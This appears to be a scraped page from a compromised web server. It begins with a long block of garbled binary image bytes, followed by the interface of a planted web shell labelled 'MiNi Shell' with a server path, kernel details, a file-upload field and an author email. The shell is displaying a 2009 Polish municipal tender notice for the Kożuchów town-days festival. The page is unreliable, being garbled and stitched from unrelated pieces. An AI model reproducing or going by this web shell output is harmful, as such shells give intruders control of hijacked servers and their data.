JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/57205-N-2009.html

<p class="kh_header"><b>Kożuchów: Organizacja i realizacja imprezy pn. DNI KOŻUCHOWA 2009</b><br>
<b>Numer ogłoszenia: 57205 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Rynek 1a, 67-120 Kożuchów, woj. lubuskie, tel. 068 3552094 do 97, faks (068) 355 28 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i realizacja imprezy pn. DNI KOŻUCHOWA 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest organizacja i realizacja imprezy DNI KOŻUCHOWA -2009 w dniach: 
30 maja 2009 r. - od godziny 16.00 do godziny 2.00 dnia następnego 
31 maja 2009 r. - od godziny 14.00 do godziny 2.00 dnia następnego 
1 czerwca 2009r. - od godziny 12.00 do godziny 22.00 
- pod względem artystycznym, sportowym, akcji reklamowej oraz zapewnienia zaplecza technicznego i urządzeń  rekreacyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 30.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy spełniają warunki  określone w  art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. P z p  (tj. Dz. U. z 2007 r. Nr  223, poz. 1655 z póź. zm.) tj:
Posiadają uprawnienia do wykonywania działalności lub czynności jeżeli ustawy  nakładają  obowiązek posiadania takich uprawnień.
W celu potwierdzenia niniejszego warunku Wykonawcy zobowiązani są przedłożyć :
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, w szczególności wykonawca musi wykazać, że: w okresie ostatnich trzech lat przed  dniem wszczęcia postępowania, a jeśli okres prowadzenia działalności jest  krótszy, to w 
tym okresie 2 usługi w zakresie organizacji przedsięwzięć kulturalnych , rozrywkowych,  rekreacyjno - sportowych typu: obchody różnego typu , koncerty , festyny ,  jarmarki, imprezy  sportowe i plenerowe o łącznej wartości min. 100 000,00 zł. 
W celu potwierdzenia tego warunku wymagane jest przedłożenie wykazu wykonanych usług oraz dokumentów  potwierdzających, że usługi te zostały wykonane należycie np. referencje. 
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonani  zamówienia. 
W celu potwierdzenia niniejszego warunku Wykonawcy zobowiązani są  przedłożyć: 
polisę a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej 
Nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24. ustawy. 
Zamawiający na podstawie złożonych przez Wykonawcę dokumentów dokona oceny  spełniania warunków podmiotowych  według formuły  spełnia-nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem  Wykonawcy z postępowania. 
Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą. 
Wymagania Zamawiającego odnośnie przedmiotu zamówienia: 
Zamawiający wymaga przedstawienia w ofercie harmonogramu rzeczowo-finansowego na  realizację przedmiotu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty jakie muszą złożyć Wykonawcy w niniejszym postępowaniu: 
Wypełniony Formularz ofertowy (załącznik nr 1 Część III SIWZ), 
Pełnomocnictwo dla reprezentanta (lidera) -dotyczy podmiotów występujących  wspólnie  (konsorcja i spółki cywilne), które winny upoważnić jednego spośród siebie jako przedstawiciela pozostałych (lider) przy czym upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich pozostałych przedsiębiorców. 
Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako reprezentant pozostałych (liderem). 
Koncepcja całej imprezy pod względem artystycznym , rekreacyjno -sportowym w  rozbiciu na każdy dzień imprezy oraz pod względem akcji reklamowej oraz zapewnienia zaplecza technicznego i urządzeń rozrywkowych wraz z  wykazem zaproponowanych  przez Wykonawcę dodatkowych atrakcji podczas  trwania imprezy oraz propozycją programowo - godzinową. 
Harmonogram rzeczowo-finansowy na realizację przedmiotu zamówienia, zgodnie z  opisem przedmiotu zamówienia wraz określeniem cen brutto, podatku VAT za poszczególne części zamówienia oraz terminów ich realizacji. 
W celu potwierdzenia spełniania warunków, o których mowa w punkcie 8 SIWZ, Wykonawcy zobowiązani  są do przedstawienia  w ofercie następujących dokumentów  i oświadczeń. 
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert.

Uwaga: 
W przypadku składania oferty przez Wykonawców występujących wspólnie w/w. dokument musi złożyć  każdy z  podmiotów  występujących wspólnie.

Wykaz (Załącznik Nr 2 Część III SIWZ) wykonanych (zakończonych) w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania, a  jeśli okres prowadzenia działalności jest krótszy, to w tym okresie, usług zbliżonych co do zakresu i  wartości do przedmiotu zamówienia 
Dokumenty potwierdzające, że usługi wymienione w załączniku nr 2 zostały wykonane należycie  ( np. referencje). 
Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy (załącznik nr 3 część III SIWZ)

Uwaga:
W przypadku składania oferty przez Wykonawców występujących wspólnie ww. dokument musi  złożyć każdy z  podmiotów  występujących wspólnie.

Polisę a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej
W stosunku do dokumentów i oświadczeń wymienionych w punkcie 9.2 Zamawiający stawia następujące wymogi formalne:
Dokumenty należy złożyć w formie oryginałów lub kopii poświadczonych przez Wykonawcę za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język  polski, poświadczonym przez  Wykonawcę. 
Dokumenty stanowiące załączniki wymagane przez niniejszą SIWZ muszą zostać wypełnione przez Wykonawcę bez wyjątku ściśle wg warunków i  postanowień w  nich zawartych bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione. 
W przypadku gdy jakakolwiek część wymaganych dokumentów nie dotyczy  Wykonawcy, wpisuje on w danym miejscu  nie dotyczy. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w punkcie  9.2.1., składa odpowiedni dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono jego upadłości; 
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów o których mowa w  pkt 9.2.1, zastępuje się je dokumentem zawierającym oświadczenie złożone prze notariuszem, właściwym organem sądowym administracyjnym albo organem samorządu zawodowego lub  gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w 
którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
Zamawiający wymaga w stosunku do podmiotów występujących wspólnie, aby: 
9.4.1 Każdy z nich oddzielnie udokumentował, że spełnia warunki określone w art. 22 ust. 1 pkt. 1-4 
Podmioty występujące wspólnie w sumie spełniały wymagane warunki w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. 
Podmioty występujące wspólnie wykazały, że przynajmniej jeden z nich posiada wymagane doświadczenie w każdej z  trzech dziedzin określonych w pkt. 9.2.4. niniejszej SIWZ. 
Upoważnili jednego spośród siebie, jako przedstawiciela pozostałych (lidera), przy  czym upoważnienie musi  być  udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich  pozostałych  przedsiębiorców. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z  przedsiębiorcą występującym jako reprezentant pozostałych (liderem). 
W przypadku wyboru oferty Wykonawców występujących wspólnie Zamawiający przed podpisaniem umowy  będzie żądał Umowy regulującej współpracę podmiotów występujących wspólnie, która zawierała będzie  zobowiązanie tych podmiotów do solidarnej odpowiedzialności z tytułu niewykonania lub nienależytego wykonania zamówienia  publicznego oraz wniesienia zabezpieczenia należytego wykonania 
umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Gry i zabawy dla dzieci - 10</li>
<li>3 - Program artystyczny i dodatkowe atrakcje proponowane przez wykonawcę - 30</li>
<li>4 - Urządzenia techniczne i rekreacyjne, wyposażenie sceny, nagłośnienia, oświetlenia, dmuchane atrakcje - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.kozuchow.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kożuchowie
ul. Rynek 1a
67-120 Kożuchów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 11:00, miejsce: Urząd Miejski w Kożuchowie
ul. Rynek 1a
67-120 Kożuchów
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com